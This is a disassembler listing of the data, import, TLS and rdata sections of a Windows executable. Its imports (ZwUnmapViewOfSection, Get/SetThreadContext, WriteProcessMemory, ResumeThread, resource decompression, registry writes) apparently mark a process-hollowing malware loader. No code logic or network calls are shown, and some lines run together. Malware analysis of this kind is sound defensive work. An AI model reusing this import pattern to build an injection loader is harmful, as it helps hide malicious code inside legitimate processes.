dword_4064D4 dd 7C90E960h ; resolved to->NTDLL.ZwUnmapViewOfSection ; sub_403590+21�w ...
dword_4064D8 dd 0 ; sub_4038F8�w
dword_4064DC dd 0 ; sub_403C40�w
dword_4064E0 dd 0 ; sub_403E28�w
dword_4064E4 dd 0 ; sub_403F34�w
dword_4064E8 dd 0 ; CODE:0040462C�o ...
dword_4064EC dd 0 ; CODE:00404648�o ...
dword_4064F0 dd 0 ; CODE:00404664�o ...
dword_4064F4 dd 0 ; CODE:00404680�o ...
dword_4064F8 dd 0 ; CODE:00404591�r ...
dword_4064FC dd 0 ; CODE:00404736�r
dd 0
dword_406504 dd 20h dup(0) db 0
byte_406585 db 3 dup(0) ; DATA XREF: CODE:004045ED�o
dd 0Fh dup(0)
db 2 dup(0)
word_4065C6 dw 0 ; DATA XREF: CODE:00404601�o
dd 0Fh dup(0)
db 3 dup(0)
byte_406607 db 0 ; DATA XREF: CODE:00404615�o
dd 11h dup(0)
aNbqbec db 'NBQBEC',0 ; DATA XREF: CODE:loc_404012�o
; CODE:00404038�o ...
align 4
dd 30320016h, 37303530h, 6578652Eh, 1E0000h, 0EC300000h
dd 41h, 2 dup(0)
dd 46AC0000h, 9Eh, 1E0000h, 10000h, 0C0000h, 0
dd 1D400h, 0
dd 101h, 5 dup(0)
dd 584B6F3Bh, 60387077h, 1003758h, 0Fh dup(0)
dd 400h, 1B5h dup(0)
dword_406DCC dd 40B618h, 9 dup(0)dword_406DF4 dd 1D400h, 9 dup(0)dword_406E1C dd 780h ; CODE:00404019�r
dword_406E20 dd 0 ; CODE:0040456C�w
dword_406E24 dd 0 ; CODE:00404069�o ...
dword_406E28 dd 53h dup(0) ; CODE:004042DF�o ...
dword_406F74 dd 0 ; CODE:004042CA�r ...
byte_406F78 db 1 ; DATA XREF: CODE:004043A4�w
; CODE:004043B3�r ...
align 4
dword_406F7C dd 0 ; CODE:004041D8�o ...
dword_406F80 dd 0 ; CODE:004040B1�r ...
off_406F84 dd offset aNbqbec ; DATA XREF: CODE:0040408C�w
; CODE:004040BA�r ...
; "NBQBEC"
db 0
BSS ends
; Section 4. (virtual address 00007000)
; Virtual size : 000005EA ( 1514.)
; Section size in file : 000005EA ( 1514.)
; Offset to raw data for section: 00007000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata segment para public 'DATA' use32
assume cs:_idata
;org 407000h
dd 3 dup(0)
dd 71B0h, 70A0h, 3 dup(0)
dd 734Eh, 710Ch, 3 dup(0)
dd 7366h, 7114h, 3 dup(0)
dd 739Ah, 7120h, 3 dup(0)
dd 73D6h, 7130h, 3 dup(0)
dd 759Ch, 719Ch, 3 dup(0)
dd 75CAh, 71A8h, 5 dup(0)
dword_4070A0 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadIddword_4070A4 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_4070A8 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcessdword_4070AC dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; CODE:loc_401714�r
dword_4070B0 dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointerdword_4070B4 dd 7C832044h ; resolved to->KERNEL32.SetEndOfFiledword_4070B8 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_4070BC dd 7C80180Eh ; resolved to->KERNEL32.ReadFile ; CODE:loc_40170C�r
dword_4070C0 dd 7C812A09h ; resolved to->KERNEL32.RaiseExceptiondword_4070C4 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandledword_4070C8 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_4070CC dd 7C80176Bh ; resolved to->KERNEL32.GetSystemTimedword_4070D0 dd 7C810E51h ; resolved to->KERNEL32.GetFileTypedword_4070D4 dd 7C801A24h ; resolved to->KERNEL32.CreateFileAdword_4070D8 dd 7C809B47h ; resolved to->KERNEL32.CloseHandledword_4070DC dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_4070E0 dd 7C809BC5h ; resolved to->KERNEL32.TlsSetValuedword_4070E4 dd 7C809740h ; resolved to->KERNEL32.TlsGetValuedword_4070E8 dd 7C80998Dh ; resolved to->KERNEL32.LocalAllocdword_4070EC dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_4070F0 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_4070F4 dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrarydword_4070F8 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeapdword_4070FC dd 7C9179FDh ; resolved to->NTDLL.RtlReAllocateHeapdword_407100 dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeapdword_407104 dd 7C80ABC1h ; resolved to->KERNEL32.GetProcessHeap dd 0
dword_40710C dd 7E42DF50h ; resolved to->USER32.CharNextA dd 0
dword_407114 dd 77124880h dword_407118 dd 771544ADh align 10h
dword_407120 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_407124 dd 77DFC41Bh ; resolved to->ADVAPI32.RegOpenKeyAdword_407128 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey align 10h
dword_407130 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_407134 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_407138 dd 7C802442h ; resolved to->KERNEL32.Sleepdword_40713C dd 7C80BC69h ; resolved to->KERNEL32.SizeofResourcedword_407140 dd 7C862A69h ; resolved to->KERNEL32.SetThreadContextdword_407144 dd 7C910340h ; resolved to->NTDLL.RtlSetLastWin32Errordword_407148 dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointerdword_40714C dd 7C8328F7h ; resolved to->KERNEL32.ResumeThreaddword_407150 dd 7C8021CCh ; resolved to->KERNEL32.ReadProcessMemorydword_407154 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_407158 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_40715C dd 7C809FB5h ; resolved to->KERNEL32.LoadResourcedword_407160 dd 7C83970Dh ; resolved to->KERNEL32.GetThreadContextdword_407164 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_407168 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_40716C dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_407170 dd 7C81153Ch ; resolved to->KERNEL32.GetFileAttributesAdword_407174 dd 7C814AF2h ; resolved to->KERNEL32.GetEnvironmentVariableAdword_407178 dd 7C8260C2h ; resolved to->KERNEL32.FreeResourcedword_40717C dd 7C80BE89h ; resolved to->KERNEL32.FindResourceAdword_407180 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcessdword_407184 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileAdword_407188 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_40718C dd 7C801A24h ; resolved to->KERNEL32.CreateFileAdword_407190 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_407194 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle dd 0
dword_40719C dd 7CA41110h ; resolved to->SHELL32.ShellExecuteAdword_4071A0 dd 7CA3F9BCh ; resolved to->SHELL32.FindExecutableA align 8
dword_4071A8 dd 7C961329h ; resolved to->NTDLL.RtlDecompressBuffer align 10h
aKernel32_dll_1 db 'kernel32.dll',0
align 10h
aGetcurrentthre db 'GetCurrentThreadId',0
align 4
dd 65470000h, 73614C74h, 72724574h, 726Fh, 78450000h, 72507469h
dd 7365636Fh, 73h, 74697257h, 6C694665h, 65h, 46746553h
dd 50656C69h, 746E696Fh, 7265h, 65530000h, 646E4574h, 6946664Fh
dd 656Ch, 74520000h, 776E556Ch, 646E69h, 65520000h, 69466461h
dd 656Ch, 61520000h, 45657369h, 70656378h, 6E6F6974h, 0
aGetstdhandle db 'GetStdHandle',0
align 4
aGetfilesize db 'GetFileSize',0
dd 65470000h, 73795374h, 546D6574h, 656D69h, 65470000h
dd 6C694674h, 70795465h, 65h, 61657243h, 69466574h, 41656Ch
dd 6C430000h, 4865736Fh, 6C646E61h, 65h, 43746547h, 616D6D6Fh
dd 694C646Eh, 41656Eh, 6C540000h, 74655373h, 756C6156h
dd 65h, 47736C54h, 61567465h, 65756Ch, 6F4C0000h, 416C6163h
dd 636F6C6Ch, 0
aGetmodulehandl db 'GetModuleHandleA',0
align 4
aGetmodulefilen db 'GetModuleFileNameA',0
align 4
dd 72460000h, 694C6565h, 72617262h, 79h, 70616548h, 65657246h
dd 0
aHeaprealloc db 'HeapReAlloc',0
dd 65480000h, 6C417061h, 636F6Ch, 65470000h, 6F725074h
dd 73736563h, 70616548h, 73750000h, 32337265h, 6C6C642Eh
dd 0
aCharnexta db 'CharNextA',0
aOleaut32_dll db 'oleaut32.dll',0
align 4
dd 79530000h, 65724673h, 72745365h, 676E69h, 79530000h
dd 41655273h, 636F6C6Ch, 69727453h, 654C676Eh, 6461006Eh
dd 69706176h, 642E3233h, 6C6Ch, 65520000h, 74655367h, 756C6156h
dd 41784565h, 0
aRegopenkeya db 'RegOpenKeyA',0
dd 65520000h, 6F6C4367h, 654B6573h, 656B0079h, 6C656E72h
dd 642E3233h, 6C6Ch, 72570000h, 50657469h, 65636F72h, 654D7373h
dd 79726F6Dh, 0
aTerminateproce db 'TerminateProcess',0
align 10h
aSleep db 'Sleep',0
align 4
aSizeofresource db 'SizeofResource',0
align 4
dd 65530000h, 72685474h, 43646165h, 65746E6Fh, 7478h, 65530000h
dd 73614C74h, 72724574h, 726Fh, 65530000h, 6C694674h, 696F5065h
dd 7265746Eh, 0
aResumethread db 'ResumeThread',0
align 10h
aReadprocessmem db 'ReadProcessMemory',0
align 4
aReadfile db 'ReadFile',0
align 10h
aLockresource db 'LockResource',0
align 10h
aLoadresource db 'LoadResource',0
align 10h
aGetthreadconte db 'GetThreadContext',0
align 4
aGetprocaddress db 'GetProcAddress',0
align 4
dd 65470000h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 65470000h
dd 6C694674h, 7A695365h, 65h, 46746547h, 41656C69h, 69727474h
dd 65747562h, 4173h, 65470000h, 766E4574h, 6E6F7269h, 746E656Dh
dd 69726156h, 656C6261h, 41h, 65657246h, 6F736552h, 65637275h
dd 0
aFindresourcea db 'FindResourceA',0
align 4
aExitprocess db 'ExitProcess',0
dd 65440000h, 6574656Ch, 656C6946h, 41h, 61657243h, 72506574h
dd 7365636Fh, 4173h, 72430000h, 65746165h, 656C6946h, 41h
dd 79706F43h, 656C6946h, 41h, 736F6C43h, 6E614865h, 656C64h
dd 6C656873h, 2E32336Ch, 6C6C64h, 68530000h, 456C6C65h
dd 75636578h, 416574h, 69460000h, 7845646Eh, 74756365h
dd 656C6261h, 746E0041h, 2E6C6C64h, 6C6C64h, 74520000h
dd 6365446Ch, 72706D6Fh, 42737365h, 65666675h
db 72h, 0
_idata ends
; Section 5. (virtual address 00008000)
; Virtual size : 00000004 ( 4.)
; Section size in file : 00000004 ( 4.)
; Offset to raw data for section: 00008000
; Flags C0000000: Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Regular
; Segment permissions: Read/Write
_tls segment para public '' use32
assume cs:_tls
;org 408000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
TlsStart dd 0 ; DATA XREF: .rdata:TlsDirectory�o
_tls ends
; Section 6. (virtual address 00009000)
; Virtual size : 00000018 ( 24.)
; Section size in file : 00000018 ( 24.)
; Offset to raw data for section: 00009000
; Flags 50000040: Data Shareable Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 409000h
TlsDirectory dd offset TlsStart
TlsEnd_ptr dd 408004h
TlsIndex_ptr dd offset TlsIndex
TlsCallbacks_ptr dd offset TlsSizeOfZeroFill
TlsSizeOfZeroFill dd 0 ; DATA XREF: .rdata:TlsCallbacks_ptr�o
TlsCharacteristics dd 0
_rdata ends
; Section 9. (virtual address 00032000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00031400
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 432000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start